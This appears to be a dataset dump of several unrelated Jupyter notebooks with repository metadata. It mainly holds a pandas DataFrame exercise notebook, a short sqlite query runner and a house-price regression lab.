"markdown" ], [ "code", "code", "code", "code" ], [ "markdown", "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code" ], [ "markdown" 
], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown", "markdown", "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code", "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code", "code", "code", "code" ], [ "markdown" ] ]
e72e4c6dc3ef0d9c180043d7b3df3d22f87aff10
6,948
ipynb
Jupyter Notebook
python/rishav/Untitled.ipynb
junaid1460/code-contribs
69b18864c3112e4efae92b8a43825d1bd344b869
[ "MIT" ]
null
null
null
python/rishav/Untitled.ipynb
junaid1460/code-contribs
69b18864c3112e4efae92b8a43825d1bd344b869
[ "MIT" ]
null
null
null
python/rishav/Untitled.ipynb
junaid1460/code-contribs
69b18864c3112e4efae92b8a43825d1bd344b869
[ "MIT" ]
null
null
null
25.638376
55
0.444588
[ [ [ "import sqlite3 as sql\nconnection = sql.connect(\"localdb\")\ncursor = connection.cursor()\nq = open(\"./queries.sql\").read()\nq = q.split(';')\nout = []\nfor i in q:\n out.append(i.replace('\\n', ''))\ntry:\n for line in out:\n cursor.execute(line)\n print(\"Executed successfully\")\nexcept:\n pass\nres = cursor.execute(\"select * from Player\")\nres.fetchall()", "_____no_output_____" ], [ "\n\n\n\n\n\n\n\n\n\n\n\n\n", "_____no_output_____" ] ] ]
[ "code" ]
[ [ "code", "code" ] ]
e72e556bc3ae8fd13c0b656e81f2f0cbf545f66e
201,388
ipynb
Jupyter Notebook
Pandas_Exercise_Dataframe.ipynb
yaozeliang/pandas_share
677bf46641e343d739f15a28408016e1b2c8efb0
[ "MIT" ]
15
2019-04-05T07:44:26.000Z
2020-12-15T19:09:01.000Z
Pandas_Exercise_Dataframe.ipynb
yaozeliang/pandas_share
677bf46641e343d739f15a28408016e1b2c8efb0
[ "MIT" ]
null
null
null
Pandas_Exercise_Dataframe.ipynb
yaozeliang/pandas_share
677bf46641e343d739f15a28408016e1b2c8efb0
[ "MIT" ]
5
2019-10-15T08:11:54.000Z
2020-06-23T06:51:53.000Z
25.948718
157
0.32352
[ [ [ "### 1", "_____no_output_____" ] ], [ [ "import pandas as pd\nimport numpy as np", "_____no_output_____" ], [ "exam_data = {'name': ['Anastasia', 'Dima', 'Katherine', 'James', 'Emily', 'Michael', 'Matthew', 'Laura', 'Kevin', 'Jonas'],\n 'score': [12.5, 9, 16.5, np.nan, 9, 20, 14.5, np.nan, 8, 19],\n 'attempts': [1, 3, 2, 3, 2, 3, 1, 1, 2, 1],\n 'qualify': ['yes', 'no', 'yes', 'no', 'no', 'yes', 'yes', 'no', 'no', 'yes']}\nlabels = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j']\n\ndf = pd.DataFrame(exam_data , index=labels)\ndf", "_____no_output_____" ], [ "df.info()", "<class 'pandas.core.frame.DataFrame'>\nIndex: 10 entries, a to j\nData columns (total 4 columns):\n # Column Non-Null Count Dtype \n--- ------ -------------- ----- \n 0 name 10 non-null object \n 1 score 8 non-null float64\n 2 attempts 10 non-null int64 \n 3 qualify 10 non-null object \ndtypes: float64(1), int64(1), object(2)\nmemory usage: 400.0+ bytes\n" ], [ "df.iloc[:3]", "_____no_output_____" ], [ "df.head(3)", "_____no_output_____" ], [ "df[['name','score']][:4]", "_____no_output_____" ], [ "print(\"Select specific columns and rows:\")\ndf.iloc[[1, 3, 5, 6], [1, 3]]", "Select specific columns and rows:\n" ], [ "print(\"Number of attempts in the examination is greater than 2:\")\ndf[df['attempts'] > 2]", "Number of attempts in the examination is greater than 2:\n" ] ], [ [ "#### count the number of rows and columns ", "_____no_output_____" ] ], [ [ "total_rows=len(df.axes[0])\ntotal_cols=len(df.axes[1])\nprint(\"Number of Rows: \"+str(total_rows))\nprint(\"Number of Columns: \"+str(total_cols))", "Number of Rows: 10\nNumber of Columns: 4\n" ], [ "print(f\"Number of Rows: {df.shape[0]}\")\nprint(f\"Number of Columns: {df.shape[1]}\")", "Number of Rows: 10\nNumber of Columns: 4\n" ] ], [ [ "#### select the rows where the score is missing", "_____no_output_____" ] ], [ [ "print(\"Rows where score is missing:\")\ndf[df['score'].isnull()]\n", "Rows where score is missing:\n" ] ], [ [ "#### 
select the rows the score is between 15 and 20 (inclusive)", "_____no_output_____" ] ], [ [ "df[df['score'].between(15, 20)]", "_____no_output_____" ], [ "df[(df['score']>=15) & (df['score']<=20)]", "_____no_output_____" ] ], [ [ "#### select the rows where number of attempts in the examination is less than 2 and score greater than 15", "_____no_output_____" ] ], [ [ "df[(df['attempts'] < 2) & (df['score'] > 15)]", "_____no_output_____" ] ], [ [ "#### change the score in row 'd' to 11.5", "_____no_output_____" ] ], [ [ "print(\"\\nOriginal data frame:\")\nprint(df)\nprint(\"\\nChange the score in row 'd' to 11.5:\")\ndf.loc['d', 'score'] = 11.5\ndf", "\nOriginal data frame:\n name score attempts qualify\na Anastasia 12.5 1 yes\nb Dima 9.0 3 no\nc Katherine 16.5 2 yes\nd James NaN 3 no\ne Emily 9.0 2 no\nf Michael 20.0 3 yes\ng Matthew 14.5 1 yes\nh Laura NaN 1 no\ni Kevin 8.0 2 no\nj Jonas 19.0 1 yes\n\nChange the score in row 'd' to 11.5:\n" ] ], [ [ "#### sum of the examination attempts by the students", "_____no_output_____" ] ], [ [ "df['attempts'].sum()", "_____no_output_____" ], [ "sum(df.attempts)", "_____no_output_____" ] ], [ [ "#### mean score for each different student in DataFrame", "_____no_output_____" ] ], [ [ "np.mean(df['score'])", "_____no_output_____" ], [ "mean = df['score'].mean()", "_____no_output_____" ], [ "\"{:.2f}\".format(mean)", "_____no_output_____" ], [ "\"{:.3f}\".format(mean)", "_____no_output_____" ], [ "\"{:.2f}%\".format(mean)", "_____no_output_____" ] ], [ [ "#### append a new row 'k' to data frame", "_____no_output_____" ] ], [ [ "print(\"\\nAppend a new row:\")\ndf.loc['k'] = [1, 'Suresh', 'yes', 15.5]\ndf", "\nAppend a new row:\n" ], [ "df = df.drop('k')\ndf", "_____no_output_____" ] ], [ [ "#### sort the DataFrame first by 'name' in descending order, then by 'score' in ascending order", "_____no_output_____" ] ], [ [ "df.sort_values(by=['name', 'score'], ascending=[False, True])", "_____no_output_____" ] ], [ [ "#### replace 
the 'qualify' column contains the values 'yes' and 'no' with True and False", "_____no_output_____" ] ], [ [ "print(\"\\nReplace the 'qualify' column contains the values 'yes' and 'no' with True and False:\")\ndf['qualify'] = df['qualify'].map({'yes': True, 'no': False})\ndf", "\nReplace the 'qualify' column contains the values 'yes' and 'no' with True and False:\n" ] ], [ [ "#### change the name 'James' to 'Suresh' in name column of the DataFrame", "_____no_output_____" ] ], [ [ "df['name'] = df['name'].replace('James', 'Suresh')\ndf", "_____no_output_____" ] ], [ [ "#### delete the 'attempts' column from the DataFrame", "_____no_output_____" ] ], [ [ "df.pop('attempts')\ndf", "_____no_output_____" ] ], [ [ "#### insert a new column in existing DataFrame", "_____no_output_____" ] ], [ [ "exam_data = {'name': ['Anastasia', 'Dima', 'Katherine', 'James', 'Emily', 'Michael', 'Matthew', 'Laura', 'Kevin', 'Jonas'],\n 'score': [12.5, 9, 16.5, np.nan, 9, 20, 14.5, np.nan, 8, 19],\n 'attempts': [1, 3, 2, 3, 2, 3, 1, 1, 2, 1],\n 'qualify': ['yes', 'no', 'yes', 'no', 'no', 'yes', 'yes', 'no', 'no', 'yes']}\nlabels = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j']\ndf = pd.DataFrame(exam_data , index=labels)\ndf", "_____no_output_____" ], [ "color = ['Red','Blue','Orange','Red','White','White','Blue','Green','Green','Red']\ndf['color'] = color\ndf", "_____no_output_____" ] ], [ [ "#### iterate over rows in a DataFrame", "_____no_output_____" ] ], [ [ "for index, row in df.iterrows():\n print(row['name'], row['score'])", "Anastasia 12.5\nDima 9.0\nKatherine 16.5\nJames nan\nEmily 9.0\nMichael 20.0\nMatthew 14.5\nLaura nan\nKevin 8.0\nJonas 19.0\n" ] ], [ [ "#### get list from DataFrame column headers", "_____no_output_____" ] ], [ [ "list(df.columns.values)", "_____no_output_____" ] ], [ [ "#### rename columns of a given DataFrame", "_____no_output_____" ] ], [ [ "d = {'col1': [1, 2, 3], 'col2': [4, 5, 6], 'col3': [7, 8, 9]}\ndf = pd.DataFrame(data=d)\nprint(\"Original 
DataFrame\")\ndf", "Original DataFrame\n" ], [ "df.columns = ['Column1', 'Column2', 'Column3']\ndf = df.rename(columns={'col1': 'Column1', 'col2': 'Column2', 'col3': 'Column3'})\nprint(\"New DataFrame after renaming columns:\")\ndf", "New DataFrame after renaming columns:\n" ] ], [ [ "#### select rows from a given DataFrame based on values in some columns", "_____no_output_____" ] ], [ [ "d = {'col1': [1, 4, 3, 4, 5], 'col2': [4, 5, 6, 7, 8], 'col3': [7, 8, 9, 0, 1]}\ndf = pd.DataFrame(data=d)\ndf", "_____no_output_____" ], [ "df.loc[df['col1'] == 4]", "_____no_output_____" ] ], [ [ "#### change the order of a DataFrame columns", "_____no_output_____" ] ], [ [ "df[['col3', 'col2', 'col1']]", "_____no_output_____" ] ], [ [ "#### add one row in an existing DataFrame", "_____no_output_____" ] ], [ [ "df2 = {'col1': 10, 'col2': 11, 'col3': 12}\ndf = df.append(df2, ignore_index=True)\ndf", "_____no_output_____" ] ], [ [ "#### count city wise number of people from a given of data set", "_____no_output_____" ] ], [ [ "\ndf1 = pd.DataFrame({'name': ['Anastasia', 'Dima', 'Katherine', 'James', 'Emily', 'Michael', 'Matthew', 'Laura', 'Kevin', 'Jonas'],\n'city': ['California', 'Los Angeles', 'California', 'California', 'California', 'Los Angeles', 'Los Angeles', 'Georgia', 'Georgia', 'Los Angeles']})\ng1 = df1.groupby([\"city\"]).size().reset_index(name='Number of people')\ng1\n", "_____no_output_____" ] ], [ [ "#### delete DataFrame row(s) based on given column value", "_____no_output_____" ] ], [ [ "df = df[df.col2 != 5]\nprint(\"New DataFrame\")\ndf", "New DataFrame\n" ] ], [ [ "#### widen output display to see more columns", "_____no_output_____" ] ], [ [ "pd.set_option('display.max_rows', 50)\npd.set_option('display.max_columns', 50)\npd.set_option('display.width', 200)\ndf", "_____no_output_____" ] ], [ [ "#### select a row of series/dataframe by given integer index", "_____no_output_____" ] ], [ [ "result = df.iloc[[2]]\nprint(\"Index-2: Details\")\nresult", "Index-2: 
Details\n" ] ], [ [ "#### replace all the NaN values with Zero's in a column of a dataframe", "_____no_output_____" ] ], [ [ "exam_data = {'name': ['Anastasia', 'Dima', 'Katherine', 'James', 'Emily', 'Michael', 'Matthew', 'Laura', 'Kevin', 'Jonas'],\n 'score': [12.5, 9, 16.5, np.nan, 9, 20, 14.5, np.nan, 8, 19],\n 'attempts': [1, 3, 2, 3, 2, 3, 1, 1, 2, 1],\n 'qualify': ['yes', 'no', 'yes', 'no', 'no', 'yes', 'yes', 'no', 'no', 'yes']}\ndf = pd.DataFrame(exam_data)\n\ndf", "_____no_output_____" ], [ "df = df.fillna(0)\ndf", "_____no_output_____" ] ], [ [ "#### convert index in a column of the given dataframe.", "_____no_output_____" ] ], [ [ "exam_data = {'name': ['Anastasia', 'Dima', 'Katherine', 'James', 'Emily', 'Michael', 'Matthew', 'Laura', 'Kevin', 'Jonas'],\n 'score': [12.5, 9, 16.5, np.nan, 9, 20, 14.5, np.nan, 8, 19],\n 'attempts': [1, 3, 2, 3, 2, 3, 1, 1, 2, 1],\n 'qualify': ['yes', 'no', 'yes', 'no', 'no', 'yes', 'yes', 'no', 'no', 'yes']}\ndf = pd.DataFrame(exam_data)\ndf.reset_index(level=0, inplace=True)\ndf", "_____no_output_____" ], [ "df.loc[0]", "_____no_output_____" ] ], [ [ "#### set a given value for particular cell in DataFrame using index value", "_____no_output_____" ] ], [ [ "df", "_____no_output_____" ], [ "print(\"\\nSet a given value for particular cell in the DataFrame\")\n\ndf.at[8,'score']=100\ndf\n", "\nSet a given value for particular cell in the DataFrame\n" ] ], [ [ "#### count the NaN values in one or more columns in DataFrame", "_____no_output_____" ] ], [ [ "df.isnull().values.sum()", "_____no_output_____" ] ], [ [ "#### drop a list of rows from a specified DataFrame", "_____no_output_____" ] ], [ [ "df = df.drop(df.index[[2,4]])\ndf", "_____no_output_____" ] ], [ [ "#### reset index in a given DataFrame.", "_____no_output_____" ] ], [ [ "exam_data = {'name': ['Anastasia', 'Dima', 'Katherine', 'James', 'Emily', 'Michael', 'Matthew', 'Laura', 'Kevin', 'Jonas'],\n 'score': [12.5, 9, 16.5, np.nan, 9, 20, 14.5, np.nan, 8, 19],\n 
'attempts': [1, 3, 2, 3, 2, 3, 1, 1, 2, 1],\n 'qualify': ['yes', 'no', 'yes', 'no', 'no', 'yes', 'yes', 'no', 'no', 'yes']}\ndf = pd.DataFrame(exam_data)\n\nprint(\"Original DataFrame\")\ndf", "Original DataFrame\n" ], [ "print(\"\\nAfter removing first and second rows\")\ndf = df.drop([0, 1])\ndf", "\nAfter removing first and second rows\n" ], [ "print(\"\\nReset the Index:\")\ndf = df.reset_index()\ndf", "\nReset the Index:\n" ] ], [ [ "#### devide a DataFrame in a given ratio", "_____no_output_____" ] ], [ [ "s1 = pd.Series(['100', '200', 'python', '300.12', '400'])\ns2 = pd.Series(['10', '20', 'php', '30.12', '40'])\nprint(\"Data Series:\")\ns1", "Data Series:\n" ], [ "s2", "_____no_output_____" ], [ "df = pd.concat([s1, s2], axis=1)\nprint(\"New DataFrame combining two series:\")\ndf", "New DataFrame combining two series:\n" ] ], [ [ "#### shuffle a given DataFrame rows", "_____no_output_____" ] ], [ [ "exam_data = {'name': ['Anastasia', 'Dima', 'Katherine', 'James', 'Emily', 'Michael', 'Matthew', 'Laura', 'Kevin', 'Jonas'],\n 'score': [12.5, 9, 16.5, np.nan, 9, 20, 14.5, np.nan, 8, 19],\n 'attempts': [1, 3, 2, 3, 2, 3, 1, 1, 2, 1],\n 'qualify': ['yes', 'no', 'yes', 'no', 'no', 'yes', 'yes', 'no', 'no', 'yes']}\ndf = pd.DataFrame(exam_data)\ndf", "_____no_output_____" ], [ "# 从对象轴返回随机的项目样本。\n\ndf = df.sample(frac=1)\ndf", "_____no_output_____" ] ], [ [ "#### 41. Write a Pandas program to convert DataFrame column type from string to datetime.\n", "_____no_output_____" ] ], [ [ "s = pd.Series(['3/11/2000', '3/12/2000', '3/13/2000'])\ns", "_____no_output_____" ], [ "r = pd.to_datetime(pd.Series(s))\ndf = pd.DataFrame(r)\ndf", "_____no_output_____" ] ], [ [ "#### 42. 
Write a Pandas program to rename a specific column name in a given DataFrame.", "_____no_output_____" ] ], [ [ "d = {'col1': [1, 2, 3], 'col2': [4, 5, 6], 'col3': [7, 8, 9]}\ndf = pd.DataFrame(data=d)\nprint(\"Original DataFrame\")\ndf", "Original DataFrame\n" ], [ "df=df.rename(columns = {'col2':'Column2'})\nlist(df.columns)", "_____no_output_____" ] ], [ [ "#### get a list of a specified column of a DataFrame.", "_____no_output_____" ] ], [ [ "lst = df[\"col1\"].tolist()\nlst", "_____no_output_____" ] ], [ [ "#### get the specified row value of a given DataFrame", "_____no_output_____" ] ], [ [ "print(\"Value of Row1\")\ndf.iloc[0]", "Value of Row1\n" ], [ "print(\"Value of Row4\")\ndf.iloc[2]", "Value of Row4\n" ] ], [ [ "#### get the datatypes of columns of a DataFrame", "_____no_output_____" ] ], [ [ "df.dtypes", "_____no_output_____" ] ], [ [ "#### append data to an empty DataFrame", "_____no_output_____" ] ], [ [ "df = pd.DataFrame()\ndata = pd.DataFrame({\"col1\": range(3),\"col2\": range(3)})\nprint(\"After appending some data:\")\ndf = df.append(data)\ndf", "After appending some data:\n" ] ], [ [ "#### convert the datatype of a given column ", "_____no_output_____" ] ], [ [ "exam_data = {'name': ['Anastasia', 'Dima', 'Katherine', 'James', 'Emily', 'Michael', 'Matthew', 'Laura', 'Kevin', 'Jonas'],\n 'score': [12.5, 9.1, 16.5, 12.77, 9.21, 20.22, 14.5, 11.34, 8.8, 19.13],\n 'attempts': [1, 3, 2, 3, 2, 3, 1, 1, 2, 1],\n 'qualify': ['yes', 'no', 'yes', 'no', 'no', 'yes', 'yes', 'no', 'no', 'yes']}\ndf = pd.DataFrame(exam_data)\ndf", "_____no_output_____" ], [ "df.dtypes", "_____no_output_____" ], [ "df.score = df.score.astype(int)\ndf.dtypes", "_____no_output_____" ] ], [ [ "#### group by the first column and get second column as lists in rows.", "_____no_output_____" ] ], [ [ "df = pd.DataFrame( {'col1':['C1','C1','C2','C2','C2','C3','C2'], 'col2':[1,2,3,3,4,6,5]})\nprint(\"Original DataFrame\")\ndf", "Original DataFrame\n" ], [ "df = 
df.groupby('col1')['col2'].apply(list)\ndf", "_____no_output_____" ] ], [ [ "#### Write a Pandas program to select all columns, except one given column in a DataFrame.", "_____no_output_____" ] ], [ [ "d = {'col1': [1, 2, 3, 4, 7], 'col2': [4, 5, 6, 9, 5], 'col3': [7, 8, 12, 1, 11]}\ndf = pd.DataFrame(data=d)\nprint(\"Original DataFrame\")\ndf", "Original DataFrame\n" ], [ "print(\"\\nAll columns except 'col3':\")\ndf = df.loc[:, df.columns != 'col3']\ndf", "\nAll columns except 'col3':\n" ] ], [ [ "#### Write a Pandas program to get topmost n records within each group of a DataFrame.", "_____no_output_____" ] ], [ [ "d = {'col1': [1, 2, 3, 4, 7, 11], 'col2': [4, 5, 6, 9, 5, 0], 'col3': [7, 5, 8, 12, 1,11]}\ndf = pd.DataFrame(data=d)\nprint(\"Original DataFrame\")\ndf", "Original DataFrame\n" ], [ "print(\"\\ntopmost n records within each group of a DataFrame:\")\ndf1 = df.nlargest(2, 'col1')\ndf1", "\ntopmost n records within each group of a DataFrame:\n" ], [ "df2 = df.nlargest(3, 'col2')\ndf2", "_____no_output_____" ], [ "df3 = df.nlargest(3, 'col3')\ndf3", "_____no_output_____" ] ], [ [ "#### Write a Pandas program to add a prefix or suffix to all columns of a given DataFrame.", "_____no_output_____" ] ], [ [ "df = pd.DataFrame({'W':[68,75,86,80,66],'X':[78,85,96,80,86], 'Y':[84,94,89,83,86],'Z':[86,97,96,72,83]});\nprint(\"Original DataFrame\")\ndf", "Original DataFrame\n" ], [ "print(\"\\nAdd prefix:\")\ndf.add_prefix(\"A_\")", "\nAdd prefix:\n" ], [ "print(\"\\nAdd suffix:\")\ndf.add_suffix(\"_1\")", "\nAdd suffix:\n" ] ], [ [ "#### Write a Pandas program to select columns by data type of a given DataFrame", "_____no_output_____" ] ], [ [ "df = pd.DataFrame({\n 'name': ['Alberto Franco','Gino Mcneill','Ryan Parkes', 'Eesha Hinton', 'Syed Wharton'],\n 'date_of_birth': ['17/05/2002','16/02/1999','25/09/1998','11/05/2002','15/09/1997'],\n 'age': [18.5, 21.2, 22.5, 22, 23]\n})\n\ndf", "_____no_output_____" ], [ "print(\"\\nSelect numerical 
columns\")\ndf.select_dtypes(include = \"number\")", "\nSelect numerical columns\n" ], [ "print(\"\\nSelect string columns\")\ndf.select_dtypes(include = \"object\")", "\nSelect string columns\n" ] ], [ [ "#### Write a Pandas program to rename all columns with the same pattern of a given DataFrame.", "_____no_output_____" ] ], [ [ "df = pd.DataFrame({\n 'Name': ['Alberto Franco','Gino Mcneill','Ryan Parkes', 'Eesha Hinton', 'Syed Wharton'],\n 'Date_Of_Birth ': ['17/05/2002','16/02/1999','25/09/1998','11/05/2002','15/09/1997'],\n 'Age': [18.5, 21.2, 22.5, 22, 23]\n})\n\nprint(\"Original DataFrame\")\ndf", "Original DataFrame\n" ], [ "df.columns = df.columns.str.lower().str.rstrip()\nprint(\"\\nRemove trailing (at the end) whitesapce and convert to lowercase of the columns name\")\ndf.head()", "\nRemove trailing (at the end) whitesapce and convert to lowercase of the columns name\n" ] ], [ [ "#### Write a Pandas program to merge datasets and check uniqueness.", "_____no_output_____" ] ], [ [ "df = pd.DataFrame({\n 'Name': ['Alberto Franco','Gino Mcneill','Ryan Parkes', 'Eesha Hinton', 'Syed Wharton'],\n 'Date_Of_Birth ': ['17/05/2002','16/02/1999','25/09/1998','11/05/2002','15/09/1997'],\n 'Age': [18.5, 21.2, 22.5, 22, 23]\n})\nprint(\"Original DataFrame:\")\nprint(df)\ndf1 = df.copy(deep = True)\ndf = df.drop([0, 1])\ndf1 = df1.drop([2])\nprint(\"\\nNew DataFrames:\")\nprint(df)\nprint(df1)", "Original DataFrame:\n Name Date_Of_Birth Age\n0 Alberto Franco 17/05/2002 18.5\n1 Gino Mcneill 16/02/1999 21.2\n2 Ryan Parkes 25/09/1998 22.5\n3 Eesha Hinton 11/05/2002 22.0\n4 Syed Wharton 15/09/1997 23.0\n\nNew DataFrames:\n Name Date_Of_Birth Age\n2 Ryan Parkes 25/09/1998 22.5\n3 Eesha Hinton 11/05/2002 22.0\n4 Syed Wharton 15/09/1997 23.0\n Name Date_Of_Birth Age\n0 Alberto Franco 17/05/2002 18.5\n1 Gino Mcneill 16/02/1999 21.2\n3 Eesha Hinton 11/05/2002 22.0\n4 Syed Wharton 15/09/1997 23.0\n" ], [ "print('\\n\"one_to_one”: check if merge keys are unique in both left and 
right datasets:\"')\ndf_one_to_one = pd.merge(df, df1, validate = \"one_to_one\")\ndf_one_to_one", "\n\"one_to_one”: check if merge keys are unique in both left and right datasets:\"\n" ], [ "print('\\n\"one_to_many” or “1:m”: check if merge keys are unique in left dataset:')\ndf_one_to_many = pd.merge(df, df1, validate = \"one_to_many\")\ndf_one_to_many", "\n\"one_to_many” or “1:m”: check if merge keys are unique in left dataset:\n" ], [ "print('“many_to_one” or “m:1”: check if merge keys are unique in right dataset:')\ndf_many_to_one = pd.merge(df, df1, validate = \"many_to_one\")\ndf_many_to_one", "“many_to_one” or “m:1”: check if merge keys are unique in right dataset:\n" ] ], [ [ "#### Write a Pandas program to convert continuous values of a column in a given DataFrame to categorical.", "_____no_output_____" ] ], [ [ "df = pd.DataFrame({\n 'name': ['Alberto Franco','Gino Mcneill','Ryan Parkes', 'Eesha Hinton', 'Syed Wharton', 'Kierra Gentry'],\n 'age': [18, 22, 85, 50, 80, 5]\n})\n\ndf", "_____no_output_____" ], [ "df[\"age_groups\"] = pd.cut(df[\"age\"], bins = [0, 18, 65, 99], labels = [\"kids\", \"adult\", \"elderly\"])\ndf", "_____no_output_____" ] ], [ [ "#### Write a Pandas program to combine many given series to create a DataFrame.", "_____no_output_____" ] ], [ [ "sr1 = pd.Series(['php', 'python', 'java', 'c#', 'c++'])\nsr2 = pd.Series([1, 2, 3, 4, 5])\nsr1", "_____no_output_____" ], [ "sr2", "_____no_output_____" ], [ "print(\"\\nUsing pandas concat:\")\nser_df = pd.concat([sr1, sr2], axis = 1)\nser_df", "\nUsing pandas concat:\n" ], [ "ser_df = pd.DataFrame({\"col1\":sr1, \"col2\":sr2})\nser_df", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown" ], [ "code", "code", "code", "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code" ] ]
e72e59b04d8c6ad118978279605c2a71bb0aa683
19,816
ipynb
Jupyter Notebook
lab12.ipynb
kendallsmith327/IA-241
7c1492ff635249849c20c083b5d7fc0518c1ab8a
[ "MIT" ]
null
null
null
lab12.ipynb
kendallsmith327/IA-241
7c1492ff635249849c20c083b5d7fc0518c1ab8a
[ "MIT" ]
null
null
null
lab12.ipynb
kendallsmith327/IA-241
7c1492ff635249849c20c083b5d7fc0518c1ab8a
[ "MIT" ]
null
null
null
27.753501
99
0.372275
[ [ [ "# Lab 12. Data Analysis in Python", "_____no_output_____" ], [ "## load data into pandas.dataframe", "_____no_output_____" ] ], [ [ "import pandas", "_____no_output_____" ], [ "df = pandas.read_excel('s3://ksmithia241-2021spring/house_price.xls')\ndf[:10]", "_____no_output_____" ] ], [ [ "## 2.1 unit price", "_____no_output_____" ] ], [ [ "df['unit_price']=df['price']/df['area']\ndf[:10]", "_____no_output_____" ] ], [ [ "## 2.2 house type", "_____no_output_____" ] ], [ [ "df['house_type'].value_counts()", "_____no_output_____" ] ], [ [ "## 2.3 average price more than two bathrooms", "_____no_output_____" ] ], [ [ "prc_more_2_bath=df.loc[ df ['bathroom']>2 ]['price']\n\nprint('avg price of houses more than 2 bathrooms is ${}'.format(prc_more_2_bath.mean()))", "avg price of houses more than 2 bathrooms is $383645.45454545453\n" ] ], [ [ "## 2.4 mean/median unit price", "_____no_output_____" ] ], [ [ "print('mean unit price is ${}'.format(df['unit_price'].mean()))", "mean unit price is $167.45934522134766\n" ], [ "print('median unit price is ${}'.format(df['unit_price'].median()))", "median unit price is $130.13392857142858\n" ] ], [ [ "## 2.5 avg price per house type", "_____no_output_____" ] ], [ [ "df.groupby('house_type').mean()['price']", "_____no_output_____" ] ], [ [ "## 2.6 predict price by house area", "_____no_output_____" ] ], [ [ "from scipy import stats", "_____no_output_____" ], [ "result = stats.linregress(df['area'],df['price'])", "_____no_output_____" ], [ "print('slope is {}'.format(result.slope))\nprint('intercept is {}'.format(result.intercept))\nprint('r square is {}'.format(result.rvalue*result.rvalue))\nprint('p value is {}'.format(result.pvalue))", "slope is 79.95495729411489\nintercept is 156254.76245096227\nr square is 0.2343900121890692\np value is 0.001340065037461188\n" ] ], [ [ "## 2.7 predict price of house 2,000 sqft", "_____no_output_____" ] ], [ [ "print('price of a house with {} sqft is 
${}'.format(2000,2000*result.slope+result.intercept))", "price of a house with 2000 sqft is $316164.67703919206\n" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown", "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code" ] ]
e72e5ec45e8c6cf1d540be077d7f9fbfd64eae48
121,271
ipynb
Jupyter Notebook
digit_recognizer.ipynb
attaullahshafiq10/digit-recognizer
9457666ebe863ef13426472ce107ab1f027ac359
[ "MIT" ]
1
2021-04-03T09:47:12.000Z
2021-04-03T09:47:12.000Z
digit_recognizer.ipynb
attaullahshafiq10/digit-recognizer
9457666ebe863ef13426472ce107ab1f027ac359
[ "MIT" ]
null
null
null
digit_recognizer.ipynb
attaullahshafiq10/digit-recognizer
9457666ebe863ef13426472ce107ab1f027ac359
[ "MIT" ]
null
null
null
40.983778
6,750
0.373643
